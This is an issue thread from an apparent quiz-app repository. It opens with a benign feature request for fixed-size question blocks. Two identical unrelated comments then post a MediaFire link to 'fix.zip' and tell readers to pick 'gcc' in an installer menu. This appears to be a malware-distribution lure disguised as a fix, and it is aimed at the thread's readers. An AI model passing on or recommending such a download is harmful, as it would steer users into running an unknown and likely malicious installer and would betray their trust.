### ISSUE TITLE
Feature Request: Fixed block size for question content

### ISSUE THREAD

**Issue by maxdiplogit** [Anonysuom/Quiz-App#27]
Currently while navigating through different questions, variable content length for a question makes the design a but inconsistent.

Making the content in a fixed block would be much better.

Would love to be of help if required 😁

**Comment by esttemanb** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."
